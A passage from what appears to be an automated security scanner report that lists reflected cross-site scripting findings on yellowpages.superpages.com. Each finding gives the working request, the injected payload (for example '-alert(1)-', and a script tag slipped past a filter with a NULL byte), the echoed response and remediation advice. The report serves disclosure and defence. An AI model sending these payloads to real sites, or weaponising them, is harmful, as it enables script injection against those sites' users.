Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1f8b6&quot;-alert(1)-&quot;067297a1807/shared.js
Server: Unspecified
Set-Cookie: JSESSIONID=6C20F9C369195FD6680789B4DF391F6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:06 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1f8b6"-alert(1)-"067297a1807/shared.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/shared.js5d77a&quot;-alert(1)-&quot;d7d525d2174
Server: Unspecified
Set-Cookie: JSESSIONID=8C5DF724BAACBD276D5052291066409F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:14 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/shared.js5d77a"-alert(1)-"d7d525d2174?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.638. http://yellowpages.superpages.com/listings.jsp [C parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 17:10:53 GMT
Connection: close


<!--

-->


                                                                        <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...
<div title=java.lang.String>javax.servlet.forward.query_string=C=florists%00e5acd<script>alert(1)</script>93fce6bf183</div>
...[SNIP]...

4.639. http://yellowpages.superpages.com/listings.jsp [C parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57369
Date: Thu, 03 Feb 2011 17:10:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
lines. */
/* 09-04-08: CMM New logic to track errors via Omniture. */
s.pageName= "Error Page Try Again";
s.pageType = "errorPage";
s.prop35 = "???omniture.error.tracking.NLF???";
s.prop39 = "floristsb00f4";alert(1)//9ea80311ee5";
s.prop6 = "Dallas";
s.prop7 = "TX";
s.prop8 = "";
s.eVar10 = "Dallas TX";
var s_code=s.t();
if(s_code)
document.write(s_code);
//-->
...[SNIP]...

4.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /listings.jsp277d5&quot;-alert(1)-&quot;5f0b41eeee6
Server: Unspecified
Set-Cookie: JSESSIONID=8E53E473DA04106852BE1CA9427A533A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:16 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56970
Date: Thu, 03 Feb 2011 17:10:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ges.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch443ae&quot;-alert(1)-&quot;9a43d5cbd11/mapsearch.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=BBEB9F1133B421096148BD47E50E8096; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:00 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch/mapsearch.jspdd6e6&quot;-alert(1)-&quot;4f9032749d1
Server: Unspecified
Set-Cookie: JSESSIONID=6A56F54F7F3562CEA77C1D9E1165869B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:15 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56887
Date: Thu, 03 Feb 2011 17:10:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
om';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profile.jspc50ad&quot;-alert(1)-&quot;eb234e6d437
Server: Unspecified
Set-Cookie: JSESSIONID=4BAED70D8FFB9064D8585BBF87B9B20C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:27 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32667
Date: Thu, 03 Feb 2011 17:10:08 GMT
Connection: close


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler88a3b&quot;-alert(1)-&quot;f68d6ca10b2/abook.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=55AB36387FFC53A62D516A7528117702; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:42 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
v = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler/abook.jsp8f26e&quot;-alert(1)-&quot;c50d8f06cd0
Server: Unspecified
Set-Cookie: JSESSIONID=3509911F0F012E3B5DB1A7C0CB989815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:53 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
//yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64285
Date: Thu, 03 Feb 2011 17:11:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
m';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64190
Date: Thu, 03 Feb 2011 17:10:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviewsdaf46&quot;-alert(1)-&quot;5c6fb56425b/js/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=8C8FB1AE6353FA670702AEA79FA748ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

